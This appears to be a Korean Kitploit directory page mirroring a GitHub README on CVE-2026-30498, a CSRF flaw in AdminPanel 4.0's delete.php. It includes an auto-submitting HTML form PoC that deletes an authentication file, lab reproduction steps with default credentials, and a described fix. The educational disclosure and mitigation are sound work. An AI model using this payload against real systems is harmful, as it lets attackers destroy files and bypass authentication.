Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-30498 — 교육용 CSRF 취약점 데모로, 통제된 실습 환경을 포함하며 개념 증명 익스플로잇과 적절한 CSRF 보호 기능이 적용된 수정 버전을 제공합니다. | Kitploit
도구/GitHubGitHub/mehdi-ben-hamou/cve-2026-30498
Vulnerability AnalysisExploitationWeb SecurityPenetration TestingLearning & EducationLabs & Practice
GitHubmehdi-ben-hamou/cve-2026-30498

CVE-2026-30498

교육용 CSRF 취약점 데모로, 통제된 실습 환경을 포함하며 개념 증명 익스플로잇과 적절한 CSRF 보호 기능이 적용된 수정 버전을 제공합니다.

저장소 보기
15개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-30498 – CSRF 취약점 (AdminPanel 4.0)


개요

CVE ID: CVE-2026-30498 (MITRE 예약)
발견자: Mehdi Ben Hamou

AdminPanel 4.0의 delete.php 엔드포인트에 교차 사이트 요청 위조(CSRF) 취약점이 존재합니다.

이 취약점으로 인해 공격자는 인증된 사용자의 동의 없이 해당 사용자를 대신하여 민감한 작업(파일 삭제)을 트리거할 수 있습니다.


기술적 세부 사항

이 취약점은 CSRF 보호 기능이 없기 때문에 발생합니다:

  • CSRF 토큰 검증 없음
  • Origin / Referer 검증 없음
  • GET 요청을 통해 노출되는 민감한 작업
  • 사용자 의도 확인 없음

취약한 엔드포인트는 요청 출처를 검증하지 않고 사용자 세션을 기반으로 요청을 직접 처리합니다.


영향

성공적인 악용 시 다음과 같은 결과가 발생합니다:

  • verifyPanel.php 삭제
  • 인증 우회
  • 애플리케이션이 설정 모드로 진입
  • 전체 시스템 재초기화 가능

영향을 받는 버전

  • AdminPanel 4.0 및 이전 버전 (보관된 프로젝트)

공격 시나리오

공격자는 위조된 요청을 전송하는 악성 웹 페이지를 호스팅합니다:

root@kitploit:~
http://localhost:8080/delete.php?file=verifyPanel.php

피해자(인증된 사용자)가 이 페이지를 방문하면 브라우저가 자동으로 세션 쿠키를 포함시키고 요청이 실행됩니다.


개념 증명(PoC)

악성 페이지 (공격자)

root@kitploit:~
<form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
  <input type="hidden" name="file" value="verifyPanel.php">
</form>
<script>
  document.getElementById("csrfForm").submit();
</script>

이 요청은 피해자의 세션 쿠키와 함께 자동으로 전송됩니다.


재현 단계

  1. 피해자 서버를 시작합니다:
root@kitploit:~
php -S localhost:8080
  1. 로그인 페이지에 접속합니다:
root@kitploit:~
http://localhost:8080
  1. 다음 계정으로 로그인합니다:
root@kitploit:~
admin / admin123
  1. 공격자 페이지를 엽니다:
root@kitploit:~
http://localhost:8081/evil.html
  1. CSRF 공격을 실행합니다
  2. 대시보드로 돌아갑니다:
root@kitploit:~
/panel/dashboard.php

내부 동작 과정

  1. 피해자가 로그인 → 세션 쿠키 생성
  2. 공격자 페이지가 위조된 요청 전송
  3. 브라우저가 자동으로 쿠키 첨부
  4. 서버가 검증 없이 삭제 실행
  5. 시스템이 인증 파일 누락 감지
  6. 애플리케이션이 설정 모드로 진입

실습 환경 (교육용 시뮬레이션)

이 저장소에는 취약점을 안전하게 재현할 수 있는 통제된 실습 환경이 포함되어 있습니다.

중요: 이 실습은 시뮬레이션이며 실제 원본 AdminPanel 코드베이스를 나타내지 않습니다.

실습 환경 초기화

환경을 초기화하려면:

root@kitploit:~
/reset.php

수정된 버전 (완화 조치)

보안 버전이 다음 파일에 구현되어 있습니다:

root@kitploit:~
delete_fixed.php

추가된 보호 기능:

  • ✅ CSRF 토큰 검증
  • ✅ POST 메서드만 허용
  • ✅ Origin / Referer 검증
  • ✅ 세션 검증

수정이 효과적인 이유

  • 공격자가 CSRF 토큰에 접근할 수 없음 (동일 출처 정책)
  • 위조된 요청에 유효한 토큰이 없음 → 거부됨
  • Origin 검사를 통해 교차 출처 요청 차단

프로젝트 구조

root@kitploit:~
victim/
├── index.php
├── delete.php
├── delete_fixed.php
├── reset.php
└── panel/
    └── dashboard.php

attacker/
└── evil.html

면책 조항

이 프로젝트는 교육 및 연구 목적으로만 제공됩니다.
적절한 권한 없이 이 취약점을 시스템에 사용하지 마십시오.

도구 다운로드